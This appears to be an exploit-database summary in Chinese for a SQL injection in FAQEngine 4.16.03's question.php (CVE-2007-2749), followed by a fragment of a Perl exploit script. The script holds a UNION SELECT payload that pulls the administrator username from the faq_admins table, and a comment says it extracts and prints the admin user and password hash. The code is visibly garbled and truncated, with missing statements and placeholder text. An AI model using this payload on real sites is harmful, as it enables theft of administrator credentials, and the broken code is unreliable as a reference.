关键信息 漏洞名称: FAQEngine 4.16.03 - 'question.php?questionref' SQL Injection EDB-ID: 3943 CVE: 2007-2749 Author: SILENTZ Type: WEBAAPPS Platform: PHP Date: 2007-05-16 Vulnerable App: FAQEngine 漏洞细节 漏洞类型: SQL Injection 漏洞位置: question.php?questionref 受影响版本: FAQEngine new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); @paths = ( "question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*", More SQL injection payloads... ); for ($i = 0; $i request(HTTP::Request->new(GET => $host)); Extract and print admin user and hash }